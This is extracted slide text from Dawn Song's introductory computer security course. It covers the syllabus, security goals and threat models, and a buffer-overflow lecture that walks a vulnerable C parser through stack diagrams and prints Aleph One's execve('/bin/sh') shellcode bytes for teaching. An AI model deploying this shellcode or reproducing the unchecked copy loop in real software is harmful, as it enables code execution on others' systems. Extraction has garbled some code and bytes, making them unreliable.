1. Computer Security Course. Dawn Song
Introduction
Dawn Song 1

2. Intro to Instructor
Born in Dalian, China Prof., UC Berkeley
Close to Korea PhD, UC Berkeley Summer school
Prof., CMU
Sep, 2002 Jul, 2007 Aug, 2012
http://www.cs.berkeley.edu/~dawnsong
dawnsong@cs.berkeley.edu
Dawn Song 2

3. Research Interests & Projects
• Computer security & privacy
• BitBlaze: Binary analysis for computer security
• WebBlaze: New technologies to enhance web security
• DroidBlaze: Android security analysis infrastructure
• Machine learning & security
• Platform for private data
Dawn Song 3

4. BitBlaze: Computer Security via Program Binary Analysis
 Unified platform to accurately analyze security properties of binaries
 Security evaluation & audit of third-party code
 Defense against morphing threats
 Faster & deeper analysis of malware
Detecting Generating Dissecting
Vulnerabilities Filters Malware
BitBlaze Binary Analysis Infrastructure
Dawn Song 4

5. WebBlaze: New Security Technologies for the Web
• Does the browser correctly enforce desired security policy?
– Cross-origin capability leaks: attacks & defense [USENIX 09]
• Is third-party content such as malicious ads securely sandboxed?
– Preventing Capability Leaks in Secure JavaScript Subsets [NDSS10]
• Do browsers & servers have consistent interpretations/views to enforce
security properties?
– Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense
[NDSS09]
– Content sniffing XSS: attacks & defense [IEEE S&P 09]
• Do applications have security vulnerabilities?
– Symbolic Execution Framework for JavaScript [IEEE S&P10]
• Do different web protocols interact securely?
– Model checking web protocols [CSF 10]
• How to build secure web applications by construction?
– Context-sensitive auto-sanitization in web applications [CCS 11]
• How to reduce TCB in web applications?
– Privilege Separation in HTML5 Applications [USENIX Security 12]
Dawn Song 5

6. DroidBlaze
Apps
Static App Runner VM
Analysis
Execution
Static Data Execution
Analyzer Exploration
App Dynamic
Rewriter Rewritten App Analysis
Behavior Analysis
Analyzed
Behavior Property
Apps
Analyzer Checker
Dawn Song 6

7. bitblaze.cs.berkeley.edu
webblaze.cs.berkeley.edu
droidblaze.cs.berkeley.edu

8. Intro of Students
• Name
• Institution
• Areas of interest
– Systems? Programming languages? AI? Theory?
• Background in computer security
– Have you taken a computer security class?
– Have you done research in computer security?
• Find partners for labs
Dawn Song 8

9. Overview of Lectures
• Syllabus
• Labs: hands-on experience
• TAs
– Dylan
– Taebum
Dawn Song 9

10. Overview of Lectures
Date/Time Topic Notes
Part 1: Software Security
Mon Aug 20 Software Security (I.1): Vulnerabilities, Attacks & Defenses. Different classes of
(09:00-12:00) vulnerabilities and attacks. Runtime defenses.
(13:00-18:00) Software Security (I.2): Deeper look at vulnerabilities and attacks (Lab Session)
Tues Aug 21 Software Security (II.1): Automatic vulnerability discovery. Static Analysis. Dynamic
(09:00-12:00) Analysis. Symbolic Execution
(13:00-18:00) Software Security (II.2): Tools for software security analysis and vulnerability discovery (Lab Session)
Part 2: Web Security
Wed Aug 22 Web Security (I.1): Vulnerabilities & attacks. Overview of web security. Different classes of
(09:00-12:00) web vulnerabilities and attacks
(13:00-18:00) Web Security (I.2): Vulnerabilities & attacks. Deeper look at web vulnerabilities & attacks (Lab Session)
Thurs Aug 23 Web Security (II.1): Automatic vulnerability discovery & defense. Automatic analysis
(09:00-12:00) techniques and tools to detect web vulnerabilities. New security primitives and
mechanisms for defenses
(13:00-18:00) Web Security (II.2): Automatic vulnerability discovery & defense. Deeper look at web (Lab Session)
defenses
Part 3: Malware and Mobile Security
Fri Aug 24 Malware and Mobile Security (1): Overview of malware. Worms and botnets. Overview of
(09:00-12:00) mobile security. Different classes of vulnerabilities & attacks. State-of-the-art defenses
(13:00-18:00) Dawn Song
Malware and Mobile Security (2): Deeper look at mobile vulnerabilities & attacks (Lab10
Session)

11. Computer Security Course. Dawn Song
Introduction to Computer Security:
Goals & Threat Models
Dawn Song 11

12. What is Computer Security About?
• General goals:
– Allow intended use of computer systems
– Prevent unintended use that may cause harm
• Examples:
– Only share your photos & location with friends
– Don’t want attackers install key-logger on your
machine to steal your password
Dawn Song 12

13. Why Should You Care?
• It impacts your day-to-day life
Dawn Song 13

14. Why Should You Care?
• It impacts everybody’s day-to-day life
– Millions of computers compromised
– Millions of passwords stolen
Dawn Song 14

15. What is Computer Security About?
• General goals:
– Allow intended use of computer systems
– Prevent unintended use that may cause harm
• More precisely…
Dawn Song 15

16. Basic Security Properties: CIA
• Confidentiality
• Integrity
• Availability
Dawn Song 16

17. Basic Security Properties (I)
• Confidentiality:
– Information is only disclosed to authorized people or
systems
– E.g., attackers cannot learn your banking info
Dawn Song 17

18. Basic Security Properties (II)
• Integrity:
– Information cannot be tampered with in an
unauthorized way
– E.g., attacker cannot change the balance of your bank
account
Dawn Song 18

19. Basic Security Properties (III)
• Availability:
– Information and services are accessible in a timely
fashion to authorized people or systems
– E.g., you should be able to login and perform
transactions on your online banking account when
you want to
Dawn Song 19

20. Basic Security Properties: CIA
• Confidentiality
• Integrity
• Availability
Dawn Song 20

21. Security Analysis
• Given a computer system, one may ask:
Is the computer system secure?
Dawn Song 21

22. Is the House Secure?
Dawn Song 22

23. It Depends …
• What are the assets? What are the goals?
Dawn Song 23

24. It Depends …
• Threat model
– In SafeLand, you don’t need to lock the door
– Attackers who pick locks
– Attackers who drive a bull-dozer
– Attackers who have super advanced technology
– Attackers who may know you well
Dawn Song 24

25. Is the House Secure?
• Is the house’s protection mechanism strong
enough to protect the assets from attackers in
a certain threat model?
Dawn Song 25

26. Which Threat Model Should You Choose?
?
Dawn Song 26

27. Cost of Security
• Should you always build & evaluate a system
secure against the strongest attacker?
– A student may simply not be able to afford an alarm
system
• Not about perfect security
Perfect Security
Risk Analysis
Dawn Song 27

28. Is the Computer System Secure?
• Is the system’s protection mechanism strong
enough to protect the assets & achieve
security goals against attackers in a certain
threat model?
Dawn Song 28

29. Key Elements to Security Analysis
Security
properties
Security
Analysis ?
Threat
Model
Dawn Song 29

30. Threat Model
• Assumptions on attackers’ abilities and resources
Network
Eavesdropper
0Day
DES Cracker
DDoS
MITM Attack Dawn Song 30

31. Which Threat Models to Choose?
• For the grade database system for your class?
• For your phone?
• For a major online banking site?
• For the system to control nuclear weapon launch?
Dawn Song 31

32. Cost of Security
• There’s no free lunch.
• There’s no free security.
• Cost of security
– Expensive to develop
– Performance overhead
– Inconvenience to users
Dawn Song 32

33. Prioritize Your Security Solution
according to Your Threat Model
• No one wants to pay more for security than
what they have to lose
• Not about perfect security
– Risk analysis Perfect Security
Risk Analysis
Dawn Song 33

34. Changing Threat Model
• Be careful when your threat model changes
– E.g., online account
Over time….
New account, nothing of value;
Account accumulates value;
No incentive for attackers
More incentive for attackers
Dawn Song 34

35. Design Impacts Cost of Security
• Good system design & architecture can reduce
cost of security
Dawn Song 35

36. Design Impacts Cost of Security
Known unpatched vulnerabilities
Secunia SecurityFocus
Browser
Extremely critical Highly critical Moderately critical Less critical Not critical Total
(number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest) (number / oldest)
1
Google Chrome 16 0 0 0 0 0
13 December 2011
4 8 12 534
Internet Explorer 6 0 0
17 November 2004 27 February 2004 5 June 2003 20 November 2000
1 4 9 213
Internet Explorer 7 0 0
30 October 2006 6 June 2006 5 June 2003 15 August 2006
1 7 123
Internet Explorer 8 0 0 0
26 February 2007 5 June 2003 14 January 2009
1 26
Internet Explorer 9 0 0 0 0
6 December 2011 5 March 2011
1
Firefox 3.6 0 0 0 0 0
20 December 2011
Firefox 9 0 0 0 0 0 0
1 2
Opera 11 0 0 0 0
6 December 2011 6 December 2011
1 2
Safari 5 0 0 0 0
8 June 2010 13 December 2011
"Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>.
Dawn Song
"Advisories." Secunia. Web. 18 Jan. 2012. <https://secunia.com/community/advisories/>.
36

37. Break
Dawn Song 37

38. Computer Security Course. Dawn Song
Software Security (I):
Buffer-overflow Attacks
Dawn Song 38

39. Intro
HTTP REQUEST
CLIENT HTTP RESPONSE
EXPLOIT
Remote
Shell
CLIENT ATTACKER SERVER
Dawn Song 39

40. Linux (32-bit) process memory layout
-0xFFFFFFFF
Reserved for Kernal
-0xC0000000
user stack
%esp
shared libraries
-0x40000000
brk
run time heap
static data segment
Loaded from exec
text segment (program)
-0x08048000
unused
-0x00000000

41. -0xC0000000 Stack Frame
To previous stack
frame pointer
user stack
arguments
return address
stack frame pointer
exception handlers
shared libraries To the point at which
-0x40000000
this function was called
local variables
run time heap
callee saved registers
static data
segment
text segment
(program)
-0x08048000
unused
-0x00000000

42. Stack Frame
1:void copy_lower (char* in, char* out) {
2: int i = 0;
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]);
5: i++;
6: }
7: buf[i] = ‘0’;
8:}
9:int parse(FILE *fp) {
10: char buf[5], *url, cmd[128];
11: fread(cmd, 1, 128, fp);
12: int header_ok = 0;
13: if (cmd[0] == ‘G’)
14: if (cmd[1] == ‘E’)
15: if (cmd[2] == ‘T’)
16: if (cmd[3] == ‘ ’)
17: header_ok = 1;
18: if (!header_ok) return -1;
19: url = cmd + 4;
20: copy_lower(url, buf);
21: printf(‚Location is %sn‛, buf);
22: return 0; }
A quick example to illustrate
multiple stack frames

43. Viewing Stack Frame with GDB
Our example modified to include
a main function
Compile: parse.c
gcc –g parse.c –o parse
1:void copy_lower (char* in, char* out) {
2: int i = 0;
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]);
Run: 5: i++;
6: }
./parse 7: buf[i] = ‘0’;
8:}
9:int parse(FILE *fp) {
10: char buf[5], *url, cmd[128];
Debug: 11: fread(cmd, 1, 128, fp);
We can debug using gdb. 12: int header_ok = 0;
13: if (cmd[0] == ‘G’)
gdb parse 14: if (cmd[1] == ‘E’)
15: if (cmd[2] == ‘T’)
16: if (cmd[3] == ‘ ’)
Then we can take a look at the stack. 17: header_ok = 1;
18: if (!header_ok) return -1;
(gdb) break 7 19: url = cmd + 4;
20: copy_lower(url, buf);
(gdb) run 21: printf(‚Location is %sn‛, buf);
(gdb) x/64x $esp 22: return 0; }
23: /** main to load a file and run parse */

44. Viewing Stack Frame with GDB
Our running example modified to
illustrate multiple stack frames
Debug: parse.c
(gdb) x/64x $esp

45. What are buffer overflows?
parse’s
parse.c frame
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008
args fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2
ret address return address
5: i++;
0xbffff758 0xbffff778
frame ptr stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf02224c
local variables buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c callee saved
0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; } registers
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
args
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac ret address return address
0x080485a2
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA frame ptr
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c local variables i
0x00000000
callee saved
registers copy_lower’s
(Unallocated) frame

46. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf022261 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000000 i
(Unallocated)

47. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf026161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000001 i
(Unallocated)

48. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0xbf616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000002 i
(Unallocated)

49. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef20dc buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000003 i
(Unallocated)

50. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef2061 buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000004 i
(Unallocated)

51. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbfef6161 buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000005 i
Uh oh….
(Unallocated)

52. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0xbffff6c4 url
8:} 0xbffff748 0x00000001 header_ok
9:int parse(FILE *fp) { 0xbffff744 0xbf616161 buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000005 i
Uh oh….
(Unallocated)

53. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0xbffff778 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
9:int parse(FILE *fp) { 0xbffff744 0x61616161 buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x0000000d i
Uh oh….
(Unallocated)

54. What are buffer overflows?
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x61616161 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
9:int parse(FILE *fp) { 0xbffff744 0x61616161 buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000019 i
Uh oh….
(Unallocated)

55. What are buffer overflows?
0x61616161
parse.c 0x61616161
0x61616161
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x61616161 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
9:int parse(FILE *fp) { 0xbffff744 0x61616161 buf[4]
10: char buf[5], *url, cmd[128]; 0xbffff740 0x61616161 buf[3,2,1,0]
11: fread(cmd, 1, 256, fp); 0xbffff73c 0x00000000 cmd[128,127,126,125]
. . .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 0x41414141
. cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 0x20544547 cmd[3,2,1,0]
20: copy_lower(url, buf); 0xbffff74c 0xbffff6c4 url
21: printf(‚Location is %sn‛, buf); 0xbffff748 0x00000001 header_ok
22: return 0; }
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000025 i
Uh oh….
(Unallocated)

56. What are buffer overflows?
0x61616161
parse.c 0x61616161
0x61616161
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x61616161 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x61616161 return address
5: i++;
0xbffff758 stack frame ptr
6: } 0x61616161
7: buf[i] = ‘0’; 0xbffff74c url
8:} 0x61616161
0xbffff748 header_ok
0x61616161
9:int parse(FILE *fp) { 0xbffff744 buf[4]
0x61616161
10: char buf[5], *url, cmd[128]; 0xbffff740 buf[3,2,1,0]
0x61616161
11: fread(cmd, 1, 256, fp); 0xbffff73c cmd[128,127,126,125]
. 0x00000000 .
12: int header_ok = 0; . . .
. . . .
. 0xbffff6c4 .
. 0x41414141 cmd[7,6,5,4]
19: url = cmd + 4; 0xbffff6c0 cmd[3,2,1,0]
20: copy_lower(url, buf); 0x20544547
0xbffff74c url
21: printf(‚Location is %sn‛, buf); 0xbffff6c4
0xbffff748 header_ok
22: return 0; } 0x00000001
23: /** main to load a file and run parse */
0xbffff6b4 0xbffff740 out
0xbffff6b0 0xbffff6c4 in
file (input file)
0xbffff6ac 0x080485a2 return address
GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0xbffff6a8 0xbffff758 stack frame ptr
0xbffff69c 0x00000025 i
And when you try to return from parse…
… SEGFAULT, since 0x61616161 is not a
valid location to return to. (Unallocated)

57. Basic Stack Exploit
• Overwriting the return address allows an attacker to
redirect the flow of program control
• Instead of crashing, this can allow arbitrary code to be
executed
– Code segment called “shellcode”
• Example: the execve system call is used to execute a file
– With the correct permissions, execve(“/bin/sh”) can be used to
obtain a root-level shell.
Dawn Song 57

58. Shellcode of execve
• How to develop shellcode that runs as execve(“/bin/sh”)?
0x80002bc <__execve>: pushl %ebp
0x80002bd <__execve+1>: movl %esp,%ebp
void main() { 0x80002bf <__execve+3>: pushl %ebx
char *name[2]; The procedure prelude.
(disassembly of execve call)*
name[0] = "/bin/sh"; 0x80002c0 <__execve+4>: movl $0xb,%eax
name[1] = NULL; Copy 0xb (11 decimal) onto the stack. This is the
execve(name[0], name, NULL); index into the syscall table. 11 is execve.
} 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx
Copy the address of "/bin/sh" into EBX.
(format instructions and data as characters)* 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx
Copy the address of name[] into ECX.
0x80002cb <__execve+15>: movl 0x10(%ebp),%edx
Copy the address of the null pointer into %edx.
“xebx1fx5ex89x76x08x31xc0x88x46x46 0x80002ce <__execve+18>: int $0x80
x0cxb0x0bx89xf3x8dx4ex08x8dx56x0c
Change into kernel mode.
xcdx80x31xdbx89xd8x40xcdx80xe8xdcx
ffxffxff/bin/sh”
Dawn Song details, refer to Smashing the stack by aleph one
*For more 58

59. Basic Stack Exploit
So suppose we overflow with a string that looks like the assembly of:
Shell Code: exec(“/bin/sh”)
high
Program P ShellCode
To previous stack To previous stack
frame pointer frame pointer
arguments arguments
return address crafted return address
return address
return address
stack frame pointer stack frame pointer
To the instruction To the instruction at which
at which this this function was called
charbuffer
buf[128] function was called
buffer
low
Dan Boneh
“xebx1fx5ex89x76x08x31xc0x88x46x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80
x31xdbx89xd8x40xcdx80xe8xdcxffxffxff/bin/sh”
When the function exits, the user gets shell !!! (exact shell code by Aleph One)
Note: shellcode runs in stack.

60. Basic Stack Exploit
parse.c
1:void copy_lower (char* in, char* out) {
2: int i = 0; 0xbffff760 0x0804a008 fp
3: while (in[i]!=‘0’ && in[i]!=‘n’) {
4: out[i] = tolower(in[i]); 0xbffff75c 0x080485a2 return address
5: i++;
0xbffff758 0x61616161 stack frame ptr
6: }
7: buf[i] = ‘0’; 0xbffff74c 0x61616161 url
8:} 0xbffff748 0x61616161 header_ok
0xbffff744 0x61616161 buf[4]
9:int parse(FILE *fp) { 0xbffff740 0x61616161 buf[3,2,1,0]
10: char buf[5], *url, cmd[128]; 0xbffff73c 0x00000000 cmd[128,127,126,125
11: fread(cmd, 1, 256, fp); . . .
12: int header_ok = 0; . . .
. 0xbffff7d8 0xfffff764 cmd[25,26,27,28]
. . . .
.
19: url = cmd + 4; . . .
20: copy_lower(url, buf); 0xbffff6c4 0x41414141 cmd[7,6,5,4]
0xbffff6c0 0x20544547 cmd[3,2,1,0]
21: printf(‚Location is %sn‛, buf); 0xbffff74c 0xbffff6c4 url
22: return 0; } 0xbffff748 0x00000001 header_ok
